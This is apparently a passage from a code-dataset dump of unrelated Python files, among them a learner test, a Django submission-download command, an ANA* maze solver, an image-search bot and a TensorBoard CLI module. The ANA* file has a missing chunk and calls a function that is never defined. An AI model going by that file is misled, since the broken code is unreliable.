against primal learner\"\"\"\n d_unary = 65\n num_states = 2\n d_edge = 11\n\n weights = np.zeros(d_unary * num_states + d_edge * num_states 
** 2)\n\n loader = ImageLoader(10, 10)\n\n images, models, labels, names = loader.load_all_images_and_labels(\n os.path.join(os.path.dirname(__file__), 'train_data'), 2, 3)\n\n learner = Learner(MatrixBeliefPropagator)\n\n learner.set_regularization(0.0, 1.0)\n\n for model, states in zip(models, labels):\n learner.add_data(states, model)\n\n args = {'max_iter': 100}\n\n start = time.time()\n subgrad_weights = learner.learn(weights, optimizer=ada_grad, opt_args=args)\n subgrad_time = time.time() - start\n print(\"Learner took %f seconds\" % subgrad_time)\n\n learner = PairedDual(MatrixBeliefPropagator)\n learner.set_regularization(0.0, 1.0)\n\n for model, states in zip(models, labels):\n learner.add_data(states, model)\n\n args = {'max_iter': 500}\n\n start = time.time()\n paired_weights = learner.learn(weights, optimizer=ada_grad, opt_args=args)\n pd_time = time.time() - start\n print(\"PD took %f seconds\" % pd_time)\n\n assert pd_time < subgrad_time, \"Paired dual learning took longer than subgradient\"\n\n print(learner.subgrad_obj(subgrad_weights), learner.subgrad_obj(paired_weights))\n\n assert learner.subgrad_obj(subgrad_weights) >= learner.subgrad_obj(paired_weights), \\\n \"subgrad reached lower minimum than paired dual\"\n\n def test_optimizer(self):\n \"\"\"Test that, once the optimizer outputs and optimum, that it does not find a better optimum on a second call\"\"\"\n d_unary = 65\n num_states = 2\n d_edge = 11\n\n learner_type = PairedDual\n inference_type = MatrixBeliefPropagator\n\n weights = np.zeros(d_unary * num_states + d_edge * num_states ** 2)\n\n image_size = 6\n\n loader = ImageLoader(image_size, image_size)\n\n images, models, labels, names = loader.load_all_images_and_labels(\n os.path.join(os.path.dirname(__file__), 'train_data'), 2, 2)\n\n # make latent variable\n\n for label in labels:\n # print \"Number of labels: %d\" % len(label)\n for x in range(int(image_size / 2)):\n for y in range(int(image_size / 2)):\n del label[(x, y)]\n # print \"Number of labels after removing quadrant: %d\" % len(label)\n\n learner = learner_type(inference_type)\n learner.set_regularization(0.0, 1.0)\n\n eval_learner = learner_type(inference_type)\n eval_learner.set_regularization(0.0, 1.0)\n\n for model, states in zip(models, labels):\n learner.add_data(states, model)\n eval_learner.add_data(states.copy(), copy.copy(model))\n\n objectives = []\n\n op = ObjectivePlotter(eval_learner.subgrad_obj, eval_learner.subgrad_grad)\n # op = ObjectivePlotter(learner.dual_obj, eval_learner.subgrad_grad)\n\n for i in range(4):\n prev_weights = weights\n start = time.time()\n\n weights = learner.learn(prev_weights, callback=op.callback)\n subgrad_time = time.time() - start\n print(\"Learner took %f seconds\" % subgrad_time)\n\n objectives.append(learner.subgrad_obj(weights))\n\n print(\"After i %d of optimization, objective was %e.\" % (i, objectives[i]))\n\n for i in range(len(objectives) - 1):\n assert objectives[i] - objectives[i + 1] < 1e-2, \\\n \"Optimizer improved after supposedly reaching optimum\"\n\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":11260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"423758362","text":"from django.core.management.base import BaseCommand\n\nfrom curriculum_tracking.models import AgileCard, ContentItem, RecruitProjectReview\nfrom curriculum_tracking.constants import RED_FLAG, 
NOT_YET_COMPETENT, COMPETENT\nfrom taggit.models import Tag\nfrom core.models import User\nfrom django.utils import timezone\n\nfrom googleapiclient.discovery import build\nfrom google_helpers.utils import authorize_creds\nfrom googleapiclient.http import MediaIoBaseDownload\nfrom googleapiclient.errors import HttpError\nimport json\nimport re\nfrom pathlib import Path\n\nDESTINATION = Path(\"gitignore/ncit_downloads\")\nTODAY = timezone.now().date().strftime(\"%a %d %b %Y\")\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n self.bot_user, _ = User.objects.get_or_create(email=\"reviewbot@noreply.org\")\n ncit_tag = Tag.objects.get(name=\"ncit\")\n all_cards = AgileCard.objects.filter(content_item__tags__in=[ncit_tag]).filter(\n content_item__content_type=ContentItem.PROJECT\n )\n\n cards_in_review = all_cards.filter(status=AgileCard.IN_REVIEW)\n for card in cards_in_review:\n url = card.recruit_project.link_submission\n if url:\n if url.startswith(\"https://drive.google.com/\"):\n self.sync_card_link(card)\n else:\n self.add_review(\n card,\n NOT_YET_COMPETENT,\n \"Please follow the submission instructions exactly: Upload the document to google drive and submit a link. Do not submit other kinds of links. The url should start with https://drive.google.com/\",\n )\n else:\n self.add_review(\n card,\n RED_FLAG,\n \"Please submit a link to your work before asking for a review. Make sure your work is publically accessable so it can be reviewed\",\n )\n\n def sync_card_link(self, card):\n user: User = card.assignees.first()\n link = card.recruit_project.link_submission\n print(f\"processing link:\\n\\t{link}\")\n\n credentials = authorize_creds()\n service = build(\"drive\", \"v3\", credentials=credentials)\n\n found = re.search(\"https://drive.google.com/file/d/(.*)/\", link)\n if found:\n file_id = found.groups()[0]\n else:\n self.add_review(\n card,\n RED_FLAG,\n \"This link is not valid. Please link to a specific file in your google drive. The link should look like this: https://drive.google.com/file/d/SOME_WEIRD_STUFF/...\",\n )\n return\n\n try:\n metadata = service.files().get(fileId=file_id).execute()\n except HttpError as e:\n if json.loads(e.content)[\"error\"][\"code\"] == 404:\n\n self.add_review(\n card,\n RED_FLAG,\n \"This link is not accessable. Please make sure it points to something that exists. The file needs to be publically accessable so that it can be reviewed. Try opening your own link in an incognito window, it should work\",\n )\n return\n extension = metadata[\"name\"].split(\".\")[-1]\n if extension not in [\"docx\"]:\n breakpoint()\n\n filename = f\"{user.last_name} {user.first_name} [{user.id}] {card.content_item.title} {TODAY}.{extension}\"\n request = service.files().get_media(fileId=file_id)\n\n with open(DESTINATION / filename, \"wb\") as fh:\n downloader = MediaIoBaseDownload(fh, request)\n done = False\n while done is False:\n status, done = downloader.next_chunk()\n # print(\"Download %d%%.\" % int(status.progress() * 100))\n\n has_review = (\n card.recruit_project.project_reviews.filter(\n timestamp__gt=card.recruit_project.review_request_time\n )\n .filter(reviewer_user=self.bot_user)\n .count()\n )\n\n if not has_review:\n # breakpoint()\n self.add_review(\n card,\n COMPETENT,\n \"The link works. 
This project is ready for assessment\",\n )\n\n def add_review(self, card, status, comments):\n review = RecruitProjectReview.objects.create(\n status=status,\n timestamp=timezone.now(),\n comments=comments,\n recruit_project=card.recruit_project,\n reviewer_user=self.bot_user,\n )\n\n\n# url = (\n# \"https://drive.google.com/file/d/1MWkJNh8uyhIUe4PteNohH1HYuocRiE5Q/view?usp=sharing\"\n# )\n# file_id = \"1MWkJNh8uyhIUe4PteNohH1HYuocRiE5Q\"\n\n\n# url = \"https://drive.google.com/file/d/1-Tqi3WZKwu8H3fK2AVJ9gvc8e0a0czOC/view\" # ok\n# file_id = \"1-Tqi3WZKwu8H3fK2AVJ9gvc8e0a0czOC\"\n\n\n# request = service.files().get_media(fileId=file_id)\n\n\n# with open(\"gitignore/temp2.docx\", \"wb\") as fh:\n# downloader = MediaIoBaseDownload(fh, request)\n# done = False\n# while done is False:\n# try:\n# status, done = downloader.next_chunk()\n# except HttpError as e:\n# # error['e'] = e\n# done = True\n# print(json.loads(e.content)[\"error\"][\"code\"] == 404)\n# else:\n# print(\"Download %d%%.\" % int(status.progress() * 100))\n","sub_path":"backend/curriculum_tracking/management/commands/sync_nqf_files.py","file_name":"sync_nqf_files.py","file_ext":"py","file_size_in_byte":5391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"177177330","text":"import re\nimport sys\nimport os\nimport numpy as np\n\nsys.path.append('../')\nimport fragility\nfrom fragility.execute.singlecore.singlepert import SinglePert\n\n\nif __name__ == '__main__':\n # extract passed in variable\n iwin = int(sys.argv[1]) - 1\n patient = str(sys.argv[2]).lower()\n winsize = int(sys.argv[3])\n stepsize = int(sys.argv[4])\n radius = float(sys.argv[5])\n perturbtype = 'C'\n\n datadir = str(sys.argv[6])\n tempdatadir = str(sys.argv[7])\n datafile = str(sys.argv[8])\n\n # output file names \n outputdir = os.path.join(tempdatadir)\n \n if not os.path.exists(outputdir):\n os.makedirs(outputdir)\n outputfilename = os.path.join(\n outputdir, patient + '_' + str(iwin) + '.npz')\n metafilename = os.path.join(outputdir, '_meta' + patient)\n\n # rawdatafile and processed data files\n adjmatsfile = os.path.join(datadir, datafile, patient + '_mvarmodel.npz')\n\n sys.stdout.write(\"Inside file for pert model.\")\n\n # load adjacency matrices\n adjmats_data = np.load(adjmatsfile)\n adjmats = adjmats_data['adjmats']\n metadata = adjmats_data['metadata'].item()\n # includedchans = metadata['includedchans']\n timepoints = metadata['timepoints']\n chanlabels = metadata['chanlabels']\n\n sys.stdout.write('Loaded mvar model at ' + str(iwin))\n\n ############## RUN MODEL(S) ###############\n # initialize the perturbation model for testing\n perturbmodel = SinglePert(radius, perturbtype)\n # run perturbation model on this windowed A matrix\n pert_dict = perturbmodel.runpertsingle(\n adjmats[iwin, :, :], iwin=iwin, fast=True)\n pertmat = pert_dict['pertmat']\n delvecs = pert_dict['delvecs']\n # delfreqs = perturbation_dict['minfreqs']\n\n # save the output for this window\n if iwin == 0:\n # save the timepoints, included channels used, parameters\n np.savez(metafilename, timepoints=timepoints,\n winsize=winsize,\n stepsize=stepsize,\n # includedchans=includedchans,\n radius=radius,\n chanlabels=chanlabels)\n sys.stdout.write('Saved meta data for %s' % patient)\n\n # save adjacency matrix\n np.savez(outputfilename, pertmat=pertmat, delvecs=delvecs)\n sys.stdout.write('Saved core pert model %s\\n' % 
str(iwin))\n","sub_path":"__old/bin_tngpipeline/slurm_fragility/gnu/gnu_run_pertmodel.py","file_name":"gnu_run_pertmodel.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"587220377","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\n\n# 2 days offset. It starts by the second line (first repeated patient entry)\nlines = [{'day':'0', 'quests':[0, 1, 2]}, # linha 0\n {'day':'1', 'quests':[0, 2]}, # linha 1\n {'day':'2', 'quests':[0, 2]}, # linha 2\n {'day':'3', 'quests':[0, 2]}, # linha 3\n {'day':'4', 'quests':[0, 2]}, # linha 4\n {'day':'5', 'quests':[0, 2]}, # linha 5\n {'day':'6', 'quests':[0, 2, 3]}, # linha 6\n {'day':'7', 'quests':[0, 2]}, # linha 7\n {'day':'8', 'quests':[0, 2]}, # linha 8\n {'day':'9', 'quests':[0, 2]}, # linha 9\n {'day':'10', 'quests':[0, 2]}, # linha 10\n {'day':'11', 'quests':[0, 2]}, # linha 11\n {'day':'12', 'quests':[0, 2]}, # linha 12\n {'day':'13', 'quests':[0, 2]}, # linha 13\n {'day':'14', 'quests':[0, 2]}, # linha 14\n {'day':'15', 'quests':[0, 2]}, # linha 15\n {'day':'16', 'quests':[0, 2]}, # linha 16\n {'day':'17', 'quests':[0, 2]}, # linha 17\n {'day':'20', 'quests':[0, 2]}, # linha 18\n {'day':'23', 'quests':[0, 2]}, # linha 19\n {'day':'26', 'quests':[0, 2]}, # linha 20\n {'day':'29', 'quests':[0, 2]}, # linha 21\n {'day':'30', 'quests':[0, 2]}, # linha 22\n {'day':'30', 'quests':[]}, # linha 23 (pós)\n] \n\n# List of questionaries, the destiny has to be filled individually for each line\nquests = [{'short':'adcl', 'desc':'Avaliação diária, clínica e laboratorial', 'start_or':0, 'end_or':0,\n 'start_loc':'data_da_avalia_o', 'end_loc':'avaliao_diria_clnica_e_laboratorial_complete'}, # quest 0\n {'short':'adip', 'desc':'Avaliação diária de imagem pulmonar', 'start_or':0, 'end_or':0,\n 'start_loc':'data_tomo', 'end_loc':'avaliao_diria_de_imagem_pulmonar_complete'}, # quest 1\n {'short':'adpvgf', 'desc':'Avaliação diária de parâmetros ventilatórios, gasométricos e funcionais', 'start_or':0, 'end_or':0,\n 'start_loc':'data_da_avalia_o_2', 'end_loc':'avaliao_diria_de_parmetros_ventilatrios_gasomtrico_complete'}, # quest 2\n {'short':'ade', 'desc':'Avaliação diária de eletrocardiograma', 'start_or':0, 'end_or':0,\n 'start_loc':'data_eletro', 'end_loc':'avaliao_de_eletrocardiograma_complete'}, # quest 3\n]\n\n\n\n# Questionaries from last line of each entry, origin and destiny columns are the same\npost = [{'desc':'Todos', 'start':0, 'end':0,\n 'start_loc':'teste_cov_2', 'end_loc':'desfecho_da_uti_complete'}] # pos uti\n\n# Create dataframe and column list\ndf = pd.read_csv('input.csv')\ncols = df.columns.tolist()\n\n# translate col names for col indexes (indexes can vary per quetionaries, names don't)\nfor q in quests:\n q['start_or'] = df.columns.get_loc(q['start_loc']);\n q['end_or'] = df.columns.get_loc(q['end_loc']);\n# translate col names for col indexes\nfor p in post:\n p['start'] = df.columns.get_loc(p['start_loc']);\n p['end'] = df.columns.get_loc(p['end_loc']);\n\nnames = []\n# For each possible line, for each questionary the current line can have, make new columns for all columns this questionary has, with the day in the column label\nfor l in range(2, len(lines)): # from day 2 to last (there's no day 0 and day 1 stays in place)\n for q in lines[l]['quests']: # for all questionaries in that line that need new columns\n for c in range(quests[q]['start_or'], quests[q]['end_or'] + 1): # for all columns from the questionary 
q\n name = quests[q]['short'] + ' ' + cols[c] + ' ' + 'dia ' + lines[l]['day']\n names.append(name)\n\n# concatenate all newly created columns with the original dataframe in a new dataframe\nnew = pd.concat([df, pd.DataFrame(columns=list(names))], sort=False)\n\n# assign values for the first entry so it can skip the \"previous post ICU\" branch\norig = 0\nlin = 1\n# for each row: if a different patient, keep its index; if the same patient, copy the daily values to their newly assigned columns\ndup = df[cols[0]].duplicated() # says if each row is a duplicate or not\nfor count in new.index.values[1:].tolist(): # removes first patient so it doesn't fill previous entry's post columns\n if (dup[count] == False): # if new patient (not duplicate)\n # fill all post\n for p in post:\n for c in range(p['start'], p['end'] + 1):\n new.iloc[orig, c] = new.iloc[count - 1, c]\n # unable to drop repeated rows here without messing with future indexes, dropping after all loops\n # new = new.drop(range(orig + 1, count)); # if orig + 1 and count are the same, it doesn't drop anyone\n orig = count # keep index\n lin = 1 # keep lines index aka first line of this entry\n else: # if same patient\n lin += 1 # increment the line index\n for q in lines[lin]['quests']: # for all quests that line lin can have\n start_d = new.columns.get_loc(quests[q]['short'] + ' ' + cols[quests[q]['start_or']] + ' ' + 'dia ' + lines[lin]['day'])\n end_d = new.columns.get_loc(quests[q]['short'] + ' ' + cols[quests[q]['end_or']] + ' ' + 'dia ' + lines[lin]['day'])\n # data goes to the correct columns, according to the day, counted by lin\n aux = quests[q]['start_or'] # aux keeps the origin indexes\n for c in range(start_d, end_d + 1): # c keeps the destination indexes\n new.iloc[orig, c] = new.iloc[count, aux]\n aux += 1\n\n# Check for duplicates in the first column, keep the first entry\nnew = new.drop_duplicates(subset=[cols[0]])\n# to export as csv\n# new.to_csv('out.csv', index=False)\n# pip install openpyxl \nnew.to_excel(\"output.xlsx\", sheet_name='Sheet_1', index=False)\n\n# -- NOT USED --\n# \n# Currently generating all new columns\n# # Append all new daily columns, for all days\n# con = pd.read_csv('concat.csv')\n# final = pd.concat([df, con], sort=False)\n\n# Doing it all at once since it's all in sequence and has destination == origin\n# # Questionnaires that won't need new columns; origin and destination columns are the same\n# post = [{'desc':'Outros testes patogênicos', 'start':210, 'end':289}, # post ICU 0\n# {'desc':'Complicações', 'start':290, 'end':318}, # post ICU 1\n# {'desc':'Tratamentos', 'start':319, 'end':370}, # post ICU 2\n# {'desc':'Desfecho da UTI', 'start':371, 'end':385}, # post ICU 3\n# ]\n","sub_path":"rows_to_cols.py","file_name":"rows_to_cols.py","file_ext":"py","file_size_in_byte":6334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"69158313","text":"import requests\nimport shutil\n\ndef download_snapshot(url):\n local_filename = url.split('/')[-1]\n r = requests.get(url, stream=True)\n with open(local_filename, 'wb') as f:\n shutil.copyfileobj(r.raw, f)\n\n return local_filename\n\n\ndownload_snapshot(\"http://s3.kiva.org/snapshots/kiva_ds_csv.zip\")\n","sub_path":"kiva/scrape_test.py","file_name":"scrape_test.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"448431135","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Feb 19 22:16:34 2019\r\n\r\n@author: 
Achyuthan\r\n\"\"\"\r\n\r\n# import libraries\r\nfrom sys import version_info\r\nif version_info.major == 2:\r\n # We are using Python 2.x\r\n from Tkinter import *\r\n import ttk\r\nelif version_info.major == 3:\r\n # We are using Python 3.x\r\n from tkinter import *\r\n from tkinter import ttk\r\nimport pdb\r\nimport time as t\r\nimport numpy as np\r\n\r\nopenlist=[] #Will contain the nodes that need to be opened\r\nG=1e15 #Cost to goal\r\nE=1e15 #The value that weights the heuristics\r\nsp=[] #records the shortest path\r\nmazelist=[] #holds all the information of the maze nodes\r\n\r\n'''\r\nDefine the color scheme for visualization. You may change it but I recommend using the same colors\r\n'''\r\n# white (0) is an unvisited node, black(1) is a wall, blue(2) is a visited node\r\n# yellow(3) is for start node, green(4) is for exit node, red (5) is a node on the completed path\r\ncolors = {5: \"red\", 4: \"green\", 3: \"yellow\", 2: \"blue\", 1: \"black\", 0: \"white\"}\r\n\r\n\r\n'''\r\nOpens the maze file and creates tkinter GUI object\r\n'''\r\n# load maze\r\nwith open(\"easy.txt\") as text:#By default the easy maze is loaded. To explore the hard maze uncomment line 37 while commenting line 36\r\n#with open(\"hard.txt\") as text:\r\n maze = [list(line.strip()) for line in text]\r\n[col, row] = np.shape(maze)\r\n\r\n# create map\r\nroot = Tk()\r\nsize = 800 / row\r\ncanvas = Canvas(root, width=(size*row), height=(size*col))\r\nroot.title(\"ANA* Algorithm\")\r\n\r\n\r\ndef draw_canvas(canvas, maze):\r\n '''\r\nFunction to draw the grid and plot the solution\r\n '''\r\n for i in range(0, col):\r\n for j in range(0, row):\r\n canvas.create_rectangle(j*size, i*size, (j+1)*size, (i+1)*size, fill=colors[int(maze[i][j])])\r\n canvas.pack()\r\n\r\n\r\nclass node:\r\n def __init__(self, val, x, y):\r\n self.color = val #Saves the color of the node in maze\r\n self.x = x #\r\n self.y = y\r\n self.e = None\r\n self.f = None\r\n self.g = 1e15 # a very high value\r\n self.h = None # use Euclidean distance as heuristic\r\n self.parent = None\r\n \r\ndef heuristics(curr,goal):\r\n '''\r\n This function is to calculate the heuristics of the algorithm. In this case Euclidean distance was used\r\n '''\r\n h=((curr.x-goal.x)**2+(curr.y-goal.y)**2)**0.5\r\n return h\r\n\r\ndef Emax(openlist,G):\r\n '''\r\n This function returns the index of the maximum e(s) value to identify the node to be expanded in the ANA* methods\r\n '''\r\n eslist=[]\r\n for i in range (0,len(openlist)):\r\n eslist.append(openlist[i].e) #records all the e values in the form of a list\r\n s=np.argmax(eslist) #argmax returns the corresponding index value of the maximum e value\r\n return s\r\n\r\ndef Eval(G,g,h):\r\n '''\r\n This function is to find the e value of all nodes given G, g and h values\r\n '''\r\n e=(G-g)/(h + 1e-15) #the 1e-15 value is to avoid the 0 heuristic value associated with goal node\r\n return e\r\n\r\ndef successor(mazelist,s):\r\n '''\r\n This function is to identify the children that will be expanded from the selected node from openlist\r\n '''\r\n children=[]\r\n for i in range (0,len(mazelist)):\r\n if i!=s:#This condition is to avoid considering the parent node as a child. 
The condition below is to satisfy the 8-neighbour condition for a parent node\r\n if (mazelist[i].x==(mazelist[s].x+1) or mazelist[i].x==(mazelist[s].x-1) or mazelist[i].x==mazelist[s].x):\r\n if mazelist[i].y==(mazelist[s].y+1) or mazelist[i].y==(mazelist[s].y-1) or mazelist[i].y==mazelist[s].y:\r\n if mazelist[i].color!=\"1\":#Checking for obstacle at node\r\n children.append(mazelist[i])\r\n return children\r\n\r\ndef locfinder(mazelist,x,y):\r\n '''\r\n Given the maze information and x and y values the corresponding index of the coordinates location will be returned by this function\r\n '''\r\n for i in range(0,len(mazelist)):\r\n if mazelist[i].x==x and mazelist[i].y==y:\r\n loc=i\r\n return loc\r\n\r\ndef improvesolution(goal):\r\n '''\r\n Given the goal this function will identify the path to the goal.\r\n Repeated iterations of the function move the algorithm towards the optimal solution\r\n '''\r\n global G,openlist,E,mazelist\r\n while len(openlist)!=0:\r\n for i in range (0,len(openlist)):\r\n openlist[i].h=heuristics(openlist[i],goal)#define the heuristics of all the nodes in the openlist\r\n openlist[i].e=Eval(G,openlist[i].g,openlist[i].h)#define the e value of all the nodes in the openlist\r\n s=Emax(openlist,G)#The maximum E value is in the location s and Snode is the corresponding node\r\n Snode=openlist[s]\r\n #print(\"gg\",openlist[s].x,\" \",openlist[s].y)\r\n del openlist[s]#the node with max e value is deleted as it is being expanded\r\n if Snode.e=G:\r\n j=openlist.pop(index) \r\n\r\n \r\n \r\n\r\n #-----------------------------------------------------------------------------------------------------------\r\n\r\n return\r\n\r\n\r\ndef main():\r\n t0=t.time()\r\n global mazelist,G,E,openlist\r\n '''\r\n Define start and goal node. You may change how to define the nodes.\r\n '''\r\n entrance_node = node(\"3\",row-1, 1)#The entrance node or start node\r\n exit_node =node(\"4\",0, col-2)#The exit node or goal\r\n\r\n\r\n # run the ana_star algorithm\r\n for i in range(0,row):#These two nested loops are to add all the information of the maze into the mazelist list of node objects\r\n for j in range (0,col):\r\n mazelist.append(node(maze[i][j],i,j))\r\n endit=locfinder(mazelist,exit_node.x,exit_node.y)#finding the location of the goal node in mazelist\r\n mazelist[endit].color=\"4\"#setting the color green for the goal node\r\n ana_star(maze, entrance_node, exit_node)#Execute the algorithm\r\n i=0\r\n for j in range(0,row):#The two nested loops supply the color information from mazelist to maze post all the operations\r\n for k in range (0,col):\r\n maze[j][k]=mazelist[i].color\r\n i=i+1\r\n for k in range (0,len(sp)):#Members of the sp path are considered to be visited nodes and are painted blue\r\n for i in range(0,row):\r\n for j in range (0,col):\r\n if i==sp[k].x and j==sp[k].y:\r\n maze[i][j]=\"2\"\r\n finch=0\r\n totalc=0\r\n i=len(sp)-1\r\n while finch==0:#Here members of the last iteration or the final optimal solution are identified and the corresponding maze locations are painted red\r\n if sp[i].x==sp[len(sp)-1].x and sp[i].y==sp[len(sp)-1].y and i!=len(sp)-1:\r\n #print(\"conditions\",sp[len(sp)-1].x,\" \",sp[len(sp)-1].y)\r\n finch=1\r\n else:\r\n for j in range(0,row):\r\n for k in range (0,col):\r\n if j==sp[i].x and k==sp[i].y:\r\n totalc=totalc+1\r\n maze[j][k]=\"5\"\r\n i=i-1\r\n pathindic=1\r\n # endpath=0\r\n pathcounter=1\r\n pathlength=0\r\n pc=0\r\n sp.reverse()\r\n condition=0\r\n final_path=[]\r\n a=[]\r\n a.append(0)\r\n print(\"Optimal Path\")\r\n for 
i in range (0,len(sp)):\r\n if (sp[i].x==exit_node.x+1 and sp[i].y==exit_node.y) or (sp[i].x==exit_node.x-1 and sp[i].y==exit_node.y) or (sp[i].x==exit_node.x and sp[i].y==exit_node.y+1) or (sp[i].x==exit_node.x and sp[i].y==exit_node.y-1):\r\n print(\"X=\",sp[i].x,\"Y=\",sp[i].y)\r\n print(\"X=\",exit_node.x,\"Y=\",exit_node.y)\r\n print(\"Path length including start and end nodes:\",pathlength+2)\r\n pathlength=0\r\n if i!=len(sp)-1:\r\n print(\"Alternate Path \",pathcounter)\r\n pathcounter=pathcounter+1\r\n else:\r\n print(\"X=\",sp[i].x,\"Y=\",sp[i].y)\r\n pathlength=pathlength+1\r\n t1=t.time()\r\n total=t1-t0\r\n print(\"Time for execution:\",total) \r\n draw_canvas(canvas,maze)\r\n \r\n root.mainloop()\r\n \r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"ANA_star_and_A_star/ANA_8neighbor.py","file_name":"ANA_8neighbor.py","file_ext":"py","file_size_in_byte":11250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"146219157","text":"# -*- coding: UTF-8 -*-\nimport requests\nfrom bs4 import BeautifulSoup\n\nclass idImageSuperLink:\n def identifyFun(self,content):\n try:\n r = requests.get(\"https://image.baidu.com/n/pc_search?queryImageUrl=\" + content + \"&uptype=urlsearch\" , timeout = 6)\n r.raise_for_status()\n\n soup = BeautifulSoup(r.text, \"html.parser\")\n dataName = soup.find(class_=\"guess-newbaike-profession\")\n if dataName != None:\n menstr = \"你要找的是不是\" + dataName.text + \"?\"\n else:\n htmlstr = r.text\n startNum = htmlstr.find('guessWord')\n htmlstr = htmlstr[startNum:]\n endNum = htmlstr.find('.split')\n htmlstr = htmlstr[13:endNum-1]\n if len(htmlstr) == 0:\n menstr = \"半姬不知道你搜的是什么哦\"\n else:\n menstr = \"你要找的是不是\" + htmlstr + \"?\"\n except:\n print(\"error2\")\n menstr = \"报错了\"\n return menstr\n\n def identifyIf(self,content):\n if content.find('识图:') >=0:\n return True\n else:\n return False\n\n def identifyImage(self,content):\n # drop the '识图:' prefix (str.strip removes characters, not a prefix)\n content = content.replace('识图:', '', 1)\n content = content.strip(' ')\n try:\n r = requests.get(content)\n if r.status_code != 200:\n menstr = \"需要图片的链接哦\"\n else:\n menstr = self.identifyFun(content)\n except:\n print(\"error\")\n menstr = \"报错了\"\n return menstr","sub_path":"other_module/idImage.py","file_name":"idImage.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"361292131","text":"import sys\nfrom argparse import ONE_OR_MORE, FileType, Namespace\nfrom collections import namedtuple\nfrom typing import Any, Dict, List\n\nfrom termcolor import colored\n\nfrom determined_common import api\nfrom determined_common.api.authentication import authentication_required\nfrom determined_common.check import check_eq\n\nfrom . 
import render\nfrom .command import Command, parse_config, render_event_stream\nfrom .declarative_argparse import Arg, Cmd\n\nTensorboard = namedtuple(\n \"Tensorboard\",\n [\"id\", \"owner\", \"description\", \"state\", \"experiment_ids\", \"trial_ids\", \"exit_status\"],\n)\n\n\ndef to_tensorboard(command: Command) -> Tensorboard:\n return Tensorboard(\n command.id,\n command.owner[\"username\"],\n command.config[\"description\"],\n command.state,\n command.misc.get(\"experiment_ids\"),\n command.misc.get(\"trial_ids\"),\n command.exit_status,\n )\n\n\n@authentication_required\ndef start_tensorboard(args: Namespace) -> None:\n if args.trial_ids is None and args.experiment_ids is None:\n print(\"Either experiment_ids or trial_ids must be specified.\")\n sys.exit(1)\n\n config = parse_config(args.config_file, None, [], [])\n req_body = {\n \"config\": config,\n \"trial_ids\": args.trial_ids,\n \"experiment_ids\": args.experiment_ids,\n }\n resp = api.post(args.master, \"tensorboard\", body=req_body).json()\n\n if args.detach:\n print(resp[\"id\"])\n return\n\n url = \"tensorboard/{}/events\".format(resp[\"id\"])\n with api.ws(args.master, url) as ws:\n for msg in ws:\n if msg[\"log_event\"] is not None:\n # TensorBoard will print a url by default. The URL is incorrect since\n # TensorBoard is not aware of the master proxy address it is assigned.\n if \"http\" in msg[\"log_event\"]:\n continue\n\n if msg[\"service_ready_event\"]:\n if args.no_browser:\n url = api.make_url(args.master, resp[\"service_address\"])\n else:\n url = api.open(args.master, resp[\"service_address\"])\n\n print(colored(\"TensorBoard is running at: {}\".format(url), \"green\"))\n render_event_stream(msg)\n break\n render_event_stream(msg)\n\n\n@authentication_required\ndef open_tensorboard(args: Namespace) -> None:\n resp = api.get(args.master, \"tensorboard/{}\".format(args.tensorboard_id)).json()\n tensorboard = render.unmarshal(Command, resp)\n check_eq(tensorboard.state, \"RUNNING\", \"TensorBoard must be in a running state\")\n api.open(args.master, resp[\"service_address\"])\n\n\n@authentication_required\ndef tail_tensorboard_logs(args: Namespace) -> None:\n url = \"tensorboard/{}/events?follow={}&tail={}\".format(\n args.tensorboard_id, args.follow, args.tail\n )\n with api.ws(args.master, url) as ws:\n for msg in ws:\n render_event_stream(msg)\n\n\n@authentication_required\ndef list_tensorboards(args: Namespace) -> None:\n if args.all:\n params = {} # type: Dict[str, Any]\n else:\n params = {\"user\": api.Authentication.instance().get_session_user()}\n\n commands = [\n render.unmarshal(Command, command)\n for command in api.get(args.master, \"tensorboard\", params=params).json().values()\n ]\n\n if args.quiet:\n for command in commands:\n print(command.id)\n return\n\n render.render_objects(Tensorboard, [to_tensorboard(command) for command in commands])\n\n\n@authentication_required\ndef kill_tensorboard(args: Namespace) -> None:\n for i, tid in enumerate(args.tensorboard_id):\n try:\n api.delete(args.master, \"tensorboard/{}\".format(tid))\n print(colored(\"Killed tensorboard {}\".format(tid), \"green\"))\n except api.errors.APIException as e:\n if not args.force:\n for ignored in args.tensorboard_id[i + 1 :]:\n print(\"Cowardly not killing {}\".format(ignored))\n raise e\n print(colored(\"Skipping: {} ({})\".format(e, type(e).__name__), \"red\"))\n\n\n@authentication_required\ndef tensorboard_config(args: Namespace) -> None:\n res_json = api.get(args.master, 
